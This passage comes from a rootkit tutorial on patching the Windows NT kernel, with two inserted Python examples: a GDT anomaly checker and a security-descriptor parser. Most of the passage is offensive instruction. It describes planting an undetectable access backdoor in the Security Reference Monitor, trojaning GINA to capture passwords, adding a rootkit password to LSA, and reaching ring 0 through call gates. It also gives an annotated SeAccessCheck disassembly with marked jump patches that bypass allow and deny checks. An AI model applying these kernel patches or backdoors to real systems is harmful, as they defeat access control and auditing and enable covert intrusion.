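                       (base >> 16) & 0xFF, access,
                       (flags_hi << 4) | ((limit >> 16) & 0xF), base >> 24)

BASELINE_SLOTS = {   # reproduces the entries in the text's SoftIce dump
    1:  _slot(0xFFFFF, 0x00000000, 0x9A, 0xC),  # 0008 Code32 flat, ring 0
    2:  _slot(0xFFFFF, 0x00000000, 0x92, 0xC),  # 0010 Data32 flat, ring 0
    3:  _slot(0xFFFFF, 0x00000000, 0xFA, 0xC),  # 0018 Code32 flat, ring 3
    4:  _slot(0xFFFFF, 0x00000000, 0xF2, 0xC),  # 0020 Data32 flat, ring 3
    5:  _slot(0x020AB, 0x8001D000, 0x8B, 0x0),  # 0028 TSS32, busy
    12: _slot(0x0FFFF, 0x00000400, 0xF2, 0x0),  # 0060 Data16, ring 3
}
# Hypothetical rogue entry: conforming code (type 0xE), DPL 0, flat 4 GB
ROGUE_SLOT = _slot(0xFFFFF, 0x00000000, 0x9E, 0xC)

def build_image(slots: dict, count: int = 13) -> bytes:
    """Concatenate slots into a GDT image; empty slots are all-zero."""
    return b"".join(slots.get(i, bytes(8)) for i in range(count))

BASELINE = build_image(BASELINE_SLOTS)
LIVE = build_image({**BASELINE_SLOTS, 9: ROGUE_SLOT})   # planted at 0048

if __name__ == "__main__":
    for d in decode_gdt(LIVE):
        print(render(d))
    for d in find_unexpected(LIVE, BASELINE):
        print("UNEXPECTED:", render(d))
```

On a real system the image would come from a kernel debugger or a driver reading the GDTR; the baseline is the snapshot you took when the machine was known to be clean.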
Patching the SRM
----------------
The Security Reference Monitor is responsible for enforcing access control.
Under NT, all of the SRM functions are handled by ntoskrnl.exe. If the
integrity of that code were violated, then the SRM could no longer be trusted.
The whole security system has failed.
The Security Reference Monitor is responsible for saying Yes/No to any object
access. It consults a process table to determine your current running process'
access token. It then compares the access token with the required access of
the object. Every object has a Security Descriptor (SD). Your running
process has an Access Token. Comparing these two structures, the SRM is able
to deny or allow you access to the object.
Orange Book:
"In October of 1972, the Computer Security Technology Planning Study, conducted
by James P. Anderson & Co., produced a report for the Electronic Systems
Division (ESD) of the United States Air Force.[1] In that report, the concept
of "a reference monitor which enforces the authorized access relationships
between subjects and objects of a system" was introduced. The reference
monitor concept was found to be an essential element of any system that would
provide multilevel secure computing facilities and controls."
It then listed the three design requirements that must be met by a reference
validation mechanism:
a. The reference validation mechanism must be tamper proof.
b. The reference validation mechanism must always be invoked.
c. The reference validation mechanism must be small enough to be
subject to analysis and tests, the completeness of which can
be assured."[1]
The SRM is *NOT* tamper proof. It may be protected by the TCB security
privilege, but I suggest that the only truly tamper-proof SRM is going to use
cryptographic mechanisms. Using an attack vector such as Virii or Trojan's, a
patch could easily be placed within the TCB.
You can patch the SRM itself if you have access to the map. In this, you can
insert a backdoor such that a certain user-id ALWAYS has access. However, this
does not require you to edit the user's security level in any way. You are
patching it at the access point, not the source. So, auditing programs will
not be able to notice the problem. This is a simple trick that could be
employed in any NT RootKit.
There are several key components to the NT Kernel. They are sometimes
referred to as the "NT Executive". The NT executive is really a group of
individual components with a well defined interface. Each component has such a
well defined interface, in fact, that you could actually take it out completely
and replace it with a new one. As long as the new component implemented all of
the same interfaces, then the system would continue to function. The following
are all components of the NT Executive:
HAL: Hardware Abstraction Layer, HAL.DLL
NTOSKERNL: Contains several components, NTOSKRNL.EXE
The Virtual Memory Manager (VMM)
The Security Reference Monitor (SRM)
The I/O Manager
The Object Manager
The Process and Thread Manager
The Kernel Services themselves
-(Exception handling and runtime library)
LPC Manager (Local Procedure Call)
Hey, these are some of the modules listed when a Blue Screen occurs! The
system is just a big memory map!
With all of this data we are bound to find structures of interest! Many key
data structures are crucial to security. Once we know what we are looking for,
we can get into SoftIce and start poking around. A list of the exported
functions for some of these components is in Appendix A.
Using a tool such as SoftIce, reverse engineering the SRM and other components
is easy ;) The methodology is simple. First, we must find the component we
are interested in. They all sit in system memory at some point...
Some key data structures are:
ACL (Access Control List), contains ACE's
ACE (Access Control Entry), has a 32-bit Access Mask and a SID
SID (Security Identifier), a big number
PTE (Page Table Entry)
SD (Security Descriptor), has an Owner SID, a Group SID, and an ACL
AT (Access Token)
Now for some tricks! The first thing we need to do is identify which of these
data structures we will be using. If we want to reverse engineer the Security
Reference Monitor, then we can be assured that our SID is going to be used in
some call somewhere.. This is where SoftIce comes in. SoftIce has an
incredible feature called expressions. SoftIce will let you define a regular
expression to be evaluated for a breakpoint. In other words, I can tell
SoftIce to break if only a special set of circumstances has occurred.
So, for example (working implementation):
1. I want softice to break if the ESI register references my SID. Since a SID
is many words long, I will have to define the expression in several portions:
bpx (ESI->0 == 0x12345678) && (ESI->4 == 0x90123456) && (ESI->8 == 0x78901234)
What I have done here is tell softice to break if the ESI register points to
the data: 0x123456789012345678901234. Notice how I use the -> operator to
offset ESI for each word.
Now, try to access an object. SoftIce will promptly break when your SID is
used in a call.
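As an added example (not part of the original article), here is a parser for a self-relative Security Descriptor down to its DACL, ACEs and SIDs, the structures listed above that the SRM compares against the Access Token, together with a simplified version of the SRM's allow/deny walk. The descriptor bytes are constructed: Everyone is allowed read/write and the Administrators group is explicitly denied, so the same desired access succeeds or fails depending on which SIDs are in the token; SIDs are compared as S-1-... strings here where the real SRM compares the binary form the bpx expression above watches for.

```python
"""
Parse a self-relative SECURITY_DESCRIPTOR (control word at offset 2,
DACL offset at 10h) down to its ACEs and SIDs, then run a simplified
SRM-style allow/deny walk of a token's SIDs against it.
Added example; all descriptor bytes are constructed.
"""
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACCESS_DENIED_ACE_TYPE = 0x01
FILE_READ_DATA, FILE_WRITE_DATA = 0x0001, 0x0002

def parse_sid(buf: bytes, off: int) -> str:
    """Decode the SID at `off`: revision, sub-authority count, 48-bit
    big-endian authority, then little-endian sub-authorities."""
    rev, count = buf[off], buf[off + 1]
    auth = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, auth) + "".join("-%d" % s for s in subs)

def parse_acl(buf: bytes, off: int) -> list:
    """Walk an ACL: 8-byte header, then AceCount ACEs laid out as
    (type, flags, size, access mask, SID)."""
    _rev, _sbz1, _size, count, _sbz2 = struct.unpack_from("<BBHHH", buf, off)
    aces, pos = [], off + 8
    for _ in range(count):
        typ, _flags, size, mask = struct.unpack_from("<BBHI", buf, pos)
        aces.append((typ, mask, parse_sid(buf, pos + 8)))
        pos += size
    return aces

def parse_sd(buf: bytes) -> dict:
    """Split a self-relative SD into control, owner, group and DACL."""
    rev, _sbz1, control, owner, group, _sacl, dacl = \
        struct.unpack_from("<BBHIIII", buf, 0)
    if rev != 1 or not control & SE_SELF_RELATIVE:
        raise ValueError("not a self-relative revision-1 SD")
    return {
        "control": control,
        "owner": parse_sid(buf, owner) if owner else None,
        "group": parse_sid(buf, group) if group else None,
        # No DACL (flag clear, or a NULL DACL pointer) is not the same as
        # an empty DACL: the former grants everything, the latter nothing.
        "dacl": parse_acl(buf, dacl) if control & SE_DACL_PRESENT and dacl else None,
    }

def access_check(sd: dict, token_sids: set, desired: int) -> bool:
    """Simplified SRM rule: ACEs are consulted in order, a matching DENY
    that covers any still-unsatisfied bit denies, ALLOW bits accumulate,
    and the check succeeds once every desired bit has been granted."""
    if sd["dacl"] is None:
        return True
    remaining = desired
    for typ, mask, sid in sd["dacl"]:
        if sid not in token_sids:
            continue
        if typ == ACCESS_DENIED_ACE_TYPE and mask & remaining:
            return False
        if typ == ACCESS_ALLOWED_ACE_TYPE:
            remaining &= ~mask
        if remaining == 0:
            return True
    return False

# ---- constructed test data -------------------------------------------
def build_sid(auth: int, *subs: int) -> bytes:
    return (struct.pack("<BB", 1, len(subs)) + auth.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))

def build_ace(typ: int, mask: int, sid: bytes) -> bytes:
    return struct.pack("<BBHI", typ, 0, 8 + len(sid), mask) + sid

def build_sd(owner: bytes, group: bytes, aces, dacl_present=True) -> bytes:
    """Lay out the 20-byte header, owner SID, group SID, then the ACL."""
    control = SE_SELF_RELATIVE | (SE_DACL_PRESENT if dacl_present else 0)
    owner_off, group_off = 20, 20 + len(owner)
    dacl_off = group_off + len(group) if dacl_present else 0
    body = b"".join(aces)
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(body), len(aces), 0) + body
    hdr = struct.pack("<BBHIIII", 1, 0, control, owner_off, group_off, 0, dacl_off)
    return hdr + owner + group + (acl if dacl_present else b"")

EVERYONE = build_sid(1, 0)            # S-1-1-0
ADMINS = build_sid(5, 32, 544)        # BUILTIN\Administrators
USERS = build_sid(5, 32, 545)         # BUILTIN\Users
RW = FILE_READ_DATA | FILE_WRITE_DATA

# Everyone allowed, Administrators explicitly denied (deny ACE listed first)
SAMPLE_SD = build_sd(ADMINS, USERS, [build_ace(ACCESS_DENIED_ACE_TYPE, RW, ADMINS),
                                     build_ace(ACCESS_ALLOWED_ACE_TYPE, RW, EVERYONE)])

if __name__ == "__main__":
    sd = parse_sd(SAMPLE_SD)          # control word comes out as 8004
    print("admin read:", access_check(sd, {"S-1-1-0", "S-1-5-32-544"}, FILE_READ_DATA))
    print("user  read:", access_check(sd, {"S-1-1-0", "S-1-5-32-545"}, FILE_READ_DATA))
```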
There are many system components that are worth reverse engineering. You may
also want to play with the following:
1. GINA, (GINA.DLL) The logon screen you see when you type your
password. Imagine if this component was trojaned.. A Virii could
capture passwords across the enterprise.
2. LSA (The Local System Authority) This is the module responsible for
querying the SAM database. This would be an ideal place to put a
rootkit-password that *ALWAYS* allows you access to the system.
3. SSDT, The System Service Descriptor Table
4. GDT, the Global Descriptor Table
5. IDT, the Interrupt Descriptor Table
Getting to ring zero in the first place
---------------------------------------
User mode is very limiting under NT. Your process is bound by the selector it
is currently using. The process cannot simply waltz over the entire memory
map. As we have discussed, the process must first load a selector. You cannot
simply read memory from 0 to FFF_, you can only access your own memory segment.
There are tricks however. If the process is running under a user token that
has "add service" privilege, then you can create your own call gate, install
it in realtime, and then use it to run your code ring 0. Once you are running
ring 0 you can patch the IDT or the Kernel. This is how User-Mode normally
accesses a Ring-0 Code Segment. If you don't want to go to this trouble,
you can upload a byte patcher that runs in ring zero on boot. This is as
simple as writing a driver and installing to run on the next reboot.
However, installing your own call-gate is by far the most sexy.
Lets talk sexy. The answer is a call gate. All of the functions provided by
NTDLL.DLL are implemented this way. This is why you must call Int 2Eh to make
a call. The entire set of Int 2Eh functions are known as the Native Call
Interface (NCI). What really happens is the Int 2Eh is handled by a function
in NTOSKRNL.EXE. This function is called KiSystemService().
KiSystemService() routes the call to the proper code location.
When you make a system call, you must first load the index of the function you
wish to call. This is loaded into register EAX. Next, if the call takes
parameters, a pointer to this block is loaded into EDX. Interrupt 2Eh is
called, and EAX holds the return value. This is old hat to most assembler
programmers.
What is not obvious is how this is implemented in the Kernel. The function
KiSystemService() is called, and left with the responsibility for dispatching
the call. KiSystemService() must first determine *WHAT* function to call next,
based on what we put in EAX. So, to this end, it maintains a table of
functions and their index numbers.. imagine that! SoftIce will dump this table
if you're interested. It looks something like:
:ntcall
Service table address: 80149398 Number of services:000000D4
0000 0008:8017451E params=06 ntoskrnl!NtConnectPort+0834
0001 0008:80199C16 params=08 ntoskrnl!SeQueryAuthenticationIdToken+04B8
0002 0008:8019B3A2 params=0B ntoskrnl!SePrivilegeObjectAuditAlarm+02B0
0003 0008:80158E50 params=02 ntoskrnl!NtAddAtom
0004 0008:80197624 params=06 ntoskrnl!NtAdjustPrivilegesToken+0422
0005 0008:80197202 params=06 ntoskrnl!NtAdjustPrivilegesToken
0006 0008:80196256 params=02 ntoskrnl!PsGetProcessExitTime+1848
0007 0008:8019620E params=01 ntoskrnl!PsGetProcessExitTime+1800
0008 0008:8015901E params=01 ntoskrnl!NtAllocateLocallyUniqueId
0009 0008:801592EC params=03 ntoskrnl!NtAllocateUuids
000A 0008:8017B0F6 params=06 ntoskrnl!NtAllocateVirtualMemory
000B 0008:8011B8E4 params=03 ntoskrnl!ZwYieldExecution+08AC
etc etc...
Well, this is all very interesting, but where is this table stored? How does
SoftIce manage to read it? Of course, it's all undocumented ;-) Here I have
no one to thank more than my friend from Sri Lanka, a fellow Rhino9 member, who
goes by the handle Joey__. His paper on extending the NCI is nothing less than
mind-blowing. I draw heavily upon his research for this section. I feel this
paper could not be complete without going over call-gates and the NCI, so I
paraphrase some of his work. For more detailed information on adding your own
system services, read his paper entitled "Adding New Services to the NT Kernel
Native API".
A very interesting thing happens when you boot NT. You start with about 200
functions in the NCI. These are all implemented in NTOSKRNL.EXE. But, soon
afterwards, another 500 or so functions are added to the NCI, these being
implemented in WIN32K.SYS. The fact that additional functions were added
proves that it is possible to register new functions into the NCI during
runtime.
The table that SoftIce dumps when you type NTCALL is called the System Service
Descriptor Table (SSDT). The SSDT is what the KiSystemService() function uses
to look up the proper function for an Int 2Eh call. Given that the NCI is
extensible, it must be possible to add new functions to this table.
As it turns out, there are actually multiple tables. WIN32K.SYS doesn't
actually add to the EXISTING system table, but creates a whole NEW one with 500
or so functions, and then ADDS it to the Kernel. To do this, it calls the
exported function KeAddSystemServiceTable(). So, in a nutshell, all we have to
do is create a new table with OUR functions and do the same thing.
Another angle on this involves adding our functions to the existing NCI table.
But, this involves patching memory. Again, that's what we do best. To pull
this trick off cleanly, we must allocate new memory large enough to hold the
old tables plus our additional entries. We then must copy the old tables
into our new memory, add our entries, and then patch memory so that
KiSystemService() looks at our new table.
The FOUR-Byte Patch
-------------------
Okay, lesson number one. Don't make yourself do extra work when you don't have
to. This is the story of my life. I started this project by reversing the
RtlXXX subroutines. For instance, there is a routine called
RtlGetOwnerSecurityDescriptor(). This is a simple utility function that
returns the Owner SID for a given security descriptor. I patched this routine
to check for the BUILTIN\Administrators group, and alter it to be the
BUILTIN\Users group. Although this patch works, it doesn't help me obtain
access to protected files and shares. The RTL routine is only called for
Process and Thread creation, it would seem. So, to make a long story short, I
have included the RTLXXX information and patch below. It will illustrate a
working kernel patch and should help you see my thought process as I 0wned a
key kernel function.
Okay, lesson number two. If at first you don't succeed, try another function.
This time I got very wise and decided to test a number of breakpoints in the
Kernel before doing any extra work. Because I wanted to circumvent access to a
file directly, I moved directly onward to the SeAccessCheck() function. Up
front, I set a breakpoint on this function to make sure it is being called when
accessing a file. To my excitement, it appears this function is called for
almost any object access, not just a file. This means network shares as well.
Going further, I tested my next patch against network share access as well as
file access. I created a test directory, shared it over the network, and
created a test file within that directory.
At first, the file had the default Everyone FULL CONTROL permissions. I set a
breakpoint on SeAccessCheck() and attempted to cat the file. For this simple
command the function is called three times:
Break due to BPX ntoskrnl!SeAccessCheck (ET=2.01 seconds)
:stack
Ntfs!PAGE+B683 at 0008:8020C203 (SS:EBP 0010:FD711D1C)
=> ntoskrnl!SeAccessCheck at 0008:8019A0E6 (SS:EBP 0010:FD711734)
Break due to BPX ntoskrnl!SeAccessCheck (ET=991.32 microseconds)
:stack
Ntfs!PAGE+B683 at 0008:8020C203 (SS:EBP 0010:FD711CB8)
=> ntoskrnl!SeAccessCheck at 0008:8019A0E6 (SS:EBP 0010:FD7116D8)
Break due to BPX ntoskrnl!SeAccessCheck (ET=637.15 microseconds)
:stack
Ntfs!PAGE+B683 at 0008:8020C203 (SS:EBP 0010:FD711D08)
=> ntoskrnl!SeAccessCheck at 0008:8019A0E6 (SS:EBP 0010:FD711720)
Next I set the file access to Administrator NO ACCESS. Attempting to cat the
file locally resulted in an "Access Denied" message. The routine is called 13
times before the Access Denied message is given. Now I try to access it over
the network. The function is called a total of 18 times before an Access Denied
message is given. It would seem it takes a lot more work to deny access than it
does to give it. ;)
I was lit now, it looked like I had my target. After another 2 shots of
espresso, I dumped the IDA file for SeAccessCheck, busted into SoftIce and
started exploring:
To make things simpler, I have removed some of the assembly code that is not
part of my discussion. If you are going to start playing with this, then you
should disassemble all of this yourself nonetheless. I recommend IDA. At
first I tried WDAsm32, but it was unable to decompile the ntoskrnl.exe
binary properly. IDA, on the other hand, had no problems. WDAsm32 has a
much nicer GUI interface, but IDA has proved more reliable. Just as most
engineers, I use many tools to get the job done, so I recommend having both
disassemblers around.
The function & patches:
8019A0E6 ; Exported entry 816. SeAccessCheck
8019A0E6
8019A0E6 ; ===========================================================================
8019A0E6
8019A0E6 ; S u b r o u t i n e
8019A0E6 ; Attributes: bp-based frame
8019A0E6
8019A0E6 public SeAccessCheck
8019A0E6 SeAccessCheck proc near
8019A0E6 ; sub_80133D06+B0p ...
8019A0E6
8019A0E6 arg_0 = dword ptr 8 ; appears to point to a
; Security Descriptor
8019A0E6 arg_4 = dword ptr 0Ch
8019A0E6 arg_8 = byte ptr 10h
8019A0E6 arg_C = dword ptr 14h
8019A0E6 arg_10 = dword ptr 18h
8019A0E6 arg_14 = dword ptr 1Ch
8019A0E6 arg_18 = dword ptr 20h
8019A0E6 arg_1C = dword ptr 24h
8019A0E6 arg_20 = dword ptr 28h
8019A0E6 arg_24 = dword ptr 2Ch
8019A0E6
8019A0E6 push ebp
8019A0E7 mov ebp, esp
8019A0E9 push ebx
8019A0EA push esi
8019A0EB push edi
8019A0EC cmp byte ptr [ebp+arg_1C], 0
8019A0F0 mov ebx, [ebp+arg_C]
8019A0F3 jnz short loc_8019A137
8019A0F5 test ebx, 2000000h
8019A0FB jz short loc_8019A11D
8019A0FD mov eax, [ebp+arg_18]
8019A100 mov edi, [ebp+arg_20]
8019A103 mov ecx, ebx
8019A105 mov eax, [eax+0Ch]
8019A108 and ecx, 0FDFFFFFFh
8019A10E mov [edi], eax
8019A110 or ecx, eax
8019A112 mov eax, [ebp+arg_10]
8019A115 or eax, ecx
8019A117 mov [edi], ecx
8019A119 mov [edi], eax
8019A11B jmp short loc_8019A13A
8019A11D ; ===========================================================================
8019A11D
8019A11D loc_8019A11D: ; CODE XREF: SeAccessCheck+15
8019A11D mov eax, [ebp+arg_10]
8019A120 mov edi, [ebp+arg_20]
8019A123 or eax, ebx
8019A125 mov edx, [ebp+arg_24]
8019A128 mov [edi], eax
8019A12A mov al, 1
8019A12C mov dword ptr [edx], 0
8019A132 jmp loc_8019A23A
8019A137 ; ===========================================================================
8019A137
8019A137 loc_8019A137: ; CODE XREF: SeAccessCheck+D
8019A137 mov edi, [ebp+arg_20]
8019A13A
8019A13A loc_8019A13A: ; CODE XREF: SeAccessCheck+35
8019A13A cmp [ebp+arg_0], 0
8019A13E jnz short loc_8019A150
8019A140 mov edx, [ebp+arg_24]
8019A143 xor al, al
; STATUS_ACCESS_DENIED not hit
; under normal means
8019A145 mov dword ptr [edx], 0C0000022h
8019A14B jmp loc_8019A23A
8019A150 ; ===========================================================================
8019A150
8019A150 loc_8019A150: ; CODE XREF: SeAccessCheck+58
8019A150 mov esi, [ebp+arg_4]
8019A153 cmp dword ptr [esi], 0
8019A156 jz short loc_8019A16E
8019A158 cmp dword ptr [esi+4], 2
8019A15C jge short loc_8019A16E
8019A15E mov edx, [ebp+arg_24]
8019A161 xor al, al
; STATUS_BAD_IMPERSONATION_LEVEL
; not normally hit
8019A163 mov dword ptr [edx], 0C00000A5h
8019A169 jmp loc_8019A23A
8019A16E ; ===========================================================================
8019A16E
8019A16E loc_8019A16E: ; CODE XREF: SeAccessCheck+70
8019A16E ; SeAccessCheck+76
8019A16E test ebx, ebx
8019A170 jnz short loc_8019A1A0
8019A172 cmp [ebp+arg_10], 0
8019A176 jnz short loc_8019A188
8019A178 mov edx, [ebp+arg_24]
8019A17B xor al, al
; STATUS_ACCESS_DENIED not
; normally hit
8019A17D mov dword ptr [edx], 0C0000022h
8019A183 jmp loc_8019A23A
8019A188 ; ===========================================================================
8019A188
8019A188 loc_8019A188: ; CODE XREF: SeAccessCheck+90
8019A188 mov eax, [ebp+arg_10]
8019A18B xor ecx, ecx
8019A18D mov edx, [ebp+arg_24]
8019A190 mov [edi], eax
8019A192 mov eax, [ebp+arg_14]
8019A195 mov [edx], ecx
8019A197 mov [eax], ecx
8019A199 mov al, 1
8019A19B jmp loc_8019A23A
8019A1A0 ; ===========================================================================
8019A1A0
8019A1A0 loc_8019A1A0: ; CODE XREF: SeAccessCheck+8A
8019A1A0 cmp [ebp+arg_8], 0
8019A1A4 jnz short loc_8019A1AC
8019A1A6 push esi
8019A1A7 call SeLockSubjectContext
8019A1AC
8019A1AC loc_8019A1AC: ; CODE XREF: SeAccessCheck+BE
8019A1AC test ebx, 2060000h
8019A1B2 jz short loc_8019A1EA
8019A1B4 mov eax, [esi]
8019A1B6 test eax, eax
8019A1B8 jnz short loc_8019A1BD
8019A1BA mov eax, [esi+8]
8019A1BD
8019A1BD loc_8019A1BD: ; CODE XREF: SeAccessCheck+D2
8019A1BD push 1
8019A1BF push [ebp+arg_0]
8019A1C2 push eax
8019A1C3 call sub_8019A376
8019A1C8 test al, al
8019A1CA jz short loc_8019A1EA
8019A1CC test ebx, 2000000h
8019A1D2 jz short loc_8019A1DA
8019A1D4 or byte ptr [ebp+arg_10+2], 6
8019A1D8 jmp short loc_8019A1E4
8019A1DA ; ===========================================================================
8019A1DA
8019A1DA loc_8019A1DA: ; CODE XREF: SeAccessCheck+EC
8019A1DA mov eax, ebx
8019A1DC and eax, 60000h
8019A1E1 or [ebp+arg_10], eax
8019A1E4
8019A1E4 loc_8019A1E4: ; CODE XREF: SeAccessCheck+F2
8019A1E4 and ebx, 0FFF9FFFFh
8019A1EA
8019A1EA loc_8019A1EA: ; CODE XREF: SeAccessCheck+CC
8019A1EA ; SeAccessCheck+E4
8019A1EA test ebx, ebx
8019A1EC jnz short loc_8019A20C
8019A1EE cmp [ebp+arg_8], 0
8019A1F2 jnz short loc_8019A1FA
8019A1F4 push esi
8019A1F5 call SeUnlockSubjectContext
8019A1FA
8019A1FA loc_8019A1FA: ; CODE XREF: SeAccessCheck+10
8019A1FA mov eax, [ebp+arg_10]
8019A1FD mov edx, [ebp+arg_24]
8019A200 mov [edi], eax
8019A202 mov al, 1
8019A204 mov dword ptr [edx], 0
8019A20A jmp short loc_8019A23A
8019A20C ; ===========================================================================
Since most of the arguments are being passed to this, it looks like this
routine is a wrapper for this other one.. lets delve deeper....
8019A20C
8019A20C loc_8019A20C: ; CODE XREF: SeAccessCheck+106
8019A20C push [ebp+arg_24]
8019A20F push [ebp+arg_14]
8019A212 push edi
8019A213 push [ebp+arg_1C]
8019A216 push [ebp+arg_10]
8019A219 push [ebp+arg_18]
8019A21C push ebx
8019A21D push dword ptr [esi]
8019A21F push dword ptr [esi+8]
8019A222 push [ebp+arg_0]
8019A225 call sub_80199836 ; decompiled below ***
8019A22A cmp [ebp+arg_8], 0
8019A22E mov bl, al
8019A230 jnz short loc_8019A238
8019A232 push esi
8019A233 call SeUnlockSubjectContext ; not usually hit
8019A238
8019A238 loc_8019A238: ; CODE XREF: SeAccessCheck+14A
8019A238 mov al, bl
8019A23A
8019A23A loc_8019A23A: ; CODE XREF: SeAccessCheck+4C
8019A23A ; SeAccessCheck+65 ...
8019A23A pop edi
8019A23B pop esi
8019A23C pop ebx
8019A23D pop ebp
8019A23E retn 28h
8019A23E SeAccessCheck endp
Subroutine called from SeAccessCheck. Looks like most of work is being done in
here. I will try to patch this routine.
80199836 ; ==============================================================================
80199836
80199836 ; S u b r o u t i n e
80199836 ; Attributes: bp-based frame
80199836
80199836 sub_80199836 proc near ; CODE XREF: PAGE:80199FFA
80199836 ; SeAccessCheck+13F ...
80199836
80199836 var_14 = dword ptr -14h
80199836 var_10 = dword ptr -10h
80199836 var_C = dword ptr -0Ch
80199836 var_8 = dword ptr -8
80199836 var_2 = byte ptr -2
80199836 arg_0 = dword ptr 8
80199836 arg_4 = dword ptr 0Ch
80199836 arg_8 = dword ptr 10h
80199836 arg_C = dword ptr 14h
80199836 arg_10 = dword ptr 18h
80199836 arg_16 = byte ptr 1Eh
80199836 arg_17 = byte ptr 1Fh
80199836 arg_18 = dword ptr 20h
80199836 arg_1C = dword ptr 24h
80199836 arg_20 = dword ptr 28h
80199836 arg_24 = dword ptr 2Ch
80199836
80199836 push ebp
80199837 mov ebp, esp
80199839 sub esp, 14h
8019983C push ebx
8019983D push esi
8019983E push edi
8019983F xor ebx, ebx
80199841 mov eax, [ebp+arg_8] ; pulls eax
80199844 mov [ebp+var_14], ebx ; ebx is zero, looks
; like it init's a
; bunch of local vars
80199847 mov [ebp+var_C], ebx
8019984A mov [ebp-1], bl
8019984D mov [ebp+var_2], bl
80199850 cmp eax, ebx ; check that arg8 is
; NULL
80199852 jnz short loc_80199857
80199854 mov eax, [ebp+arg_4] ; arg4 pts to
; "USER32 "
80199857
80199857 loc_80199857:
80199857 mov edi, [ebp+arg_C] ; checking some flags
; off of this one
8019985A mov [ebp+var_8], eax ; var_8 = arg_4
8019985D test edi, 1000000h ; obviously flags..
; desired access mask
; I think...
80199863 jz short loc_801998CA ; normally this jumps..
; go ahead and jump
80199865 push [ebp+arg_18]
80199868 push [ebp+var_8]
8019986B push dword_8014EE94
80199871 push dword_8014EE90
80199877 call sub_8019ADE0 ; another undoc'd sub
8019987C test al, al ; return code
8019987E jnz short loc_80199890
80199880 mov ecx, [ebp+arg_24]
80199883 xor al, al
80199885 mov dword ptr [ecx], 0C0000061h
8019988B jmp loc_80199C0C
80199890 ;
===========================================================================
removed source here
801998CA ;
===========================================================================
801998CA
801998CA loc_801998CA: ; jump from above lands here
801998CA ; sub_80199836
801998CA mov eax, [ebp+arg_0] ; arg0 pts to a
; Security Descriptor
801998CD mov dx, [eax+2] ; offset 2 is that
; 80 04 number...
801998D1 mov cx, dx
801998D4 and cx, 4 ; 80 04 become 00 04
801998D8 jz short loc_801998EA ; normally doesnt jump
801998DA mov esi, [eax+10h] ; SD[10h] is an offset
; value to the DACL in
; the SD
801998DD test esi, esi ; make sure it exists
801998DF jz short loc_801998EA
801998E1 test dh, 80h
801998E4 jz short loc_801998EC
801998E6 add esi, eax ; FFWDS to first DACL
; in SD ******
801998E8 jmp short loc_801998EC ; normally all good
; here, go ahead and
; jump
801998EA ;
===========================================================================
801998EA
801998EA loc_801998EA: ; CODE XREF: sub_80199836+A2
801998EA ; sub_80199836+A9
801998EA xor esi, esi
801998EC
801998EC loc_801998EC: ; CODE XREF: sub_80199836+AE
801998EC ; sub_80199836+B2
801998EC cmp cx, 4 ; jump lands here
801998F0 jnz loc_80199BC6
801998F6 test esi, esi
801998F8 jz loc_80199BC6
801998FE test edi, 80000h ; we normally dont match this,
; so go ahead and jump
80199904 jz short loc_8019995E
- ** removed source here ***
8019995E ;
===========================================================================
8019995E
8019995E loc_8019995E: ; CODE XREF: sub_80199836+CE
8019995E ; sub_80199836+D4 ...
8019995E movzx eax, word ptr [esi+4] ; jump lands
80199962 mov [ebp+var_10], eax ; offset 4 is number of
; ACE's present in DACL
; var_10 = # Ace's
80199965 xor eax, eax
80199967 cmp [ebp+var_10], eax
8019996A jnz short loc_801999B7 ; normally jump
- ** removed source here ***
801999A2 ;
===========================================================================
- ** removed source here ***
801999B7 ;
===========================================================================
801999B7
801999B7 loc_801999B7: ; CODE XREF: sub_80199836+134
801999B7 test byte ptr [ebp+arg_C+3], 2 ; looks like part of
; the flags data,
; we usually jump
801999BB jz loc_80199AD3
- ** removed source here ***
80199AD3 ;
===========================================================================
80199AD3
80199AD3 loc_80199AD3: ; CODE XREF: sub_80199836+185
80199AD3 mov [ebp+var_C], 0 ; jump lands here
80199ADA add esi, 8
80199ADD cmp [ebp+var_10], 0 ; is number of ACE's zero?
80199AE1 jz loc_80199B79 ; normally not
80199AE7
80199AE7 loc_80199AE7: ; CODE XREF: sub_80199836+33D
80199AE7 test edi, edi ; the EDI register is very
; important we will continue
; to loop back to this point
; as we traverse each ACE
; the EDI register is modified
; with each ACE's access mask
; if a SID match occurs.
; Access is allowed only if
; EDI is completely blank
; by the time we are done. :-)
80199AE9 jz loc_80199B79 ; jumps to exit routine
; if EDI is blank
80199AEF test byte ptr [esi+1], 8 ; checks for ACE value
; 8, second byte..
; i dont know what
; this is, but if it's
; not 8, its not
; evaluated, not
; important
80199AF3 jnz short loc_80199B64
80199AF5 mov al, [esi] ; this is the ACE type,
; which is 0, 1, or 4
80199AF7 test al, al ; 0 is ALLOWED_TYPE and
; 1 is DENIED_TYPE
80199AF9 jnz short loc_80199B14 ; jump to next block if
; it's not type 0
80199AFB lea eax, [esi+8] ; offset 8 is the SID
80199AFE push eax ; pushes the ACE
80199AFF push [ebp+var_8]
80199B02 call sub_801997C2 ; checks to see if the
; caller matches the
; SID return of 1 says
; we matched, 0 means
; we did not
80199B07 test al, al
80199B09 jz short loc_80199B64 ; a match here is good,
; since its the ALLOWED
; list
; so a 2 byte patch can
; NOP out this jump
; <PATCH ME>
80199B0B mov eax, [esi+4]
80199B0E not eax
80199B10 and edi, eax ; whiddles off the part
; of EDI that we
; matched ..
; this chopping of
; flags can go on through
; many loops
; remember, we are only
; good if ALL of EDI is
; chopped away...
80199B12 jmp short loc_80199B64
80199B14 ;
===========================================================================
80199B14
80199B14 loc_80199B14: ; CODE XREF: sub_80199836+2C3
80199B14 cmp al, 4 ; check for ACE type 4
80199B16 jnz short loc_80199B4B ; normally we aren't
; this type, so jump
- ** removed source here ***
80199B4B ;
===========================================================================
80199B4B
80199B4B loc_80199B4B: ; CODE XREF: sub_80199836+2E0j
80199B4B cmp al, 1 ; check for DENIED type
80199B4D jnz short loc_80199B64
80199B4F lea eax, [esi+8] ; offset 8 is the SID
80199B52 push eax
80199B53 push [ebp+var_8]
80199B56 call sub_801997C2 ; check the callers SID
80199B5B test al, al ; a match here is BAD,
; since we are being
; DENIED
80199B5D jz short loc_80199B64 ; so make JZ a normal
; JMP <PATCH ME>
80199B5F test [esi+4], edi ; we avoid this flag
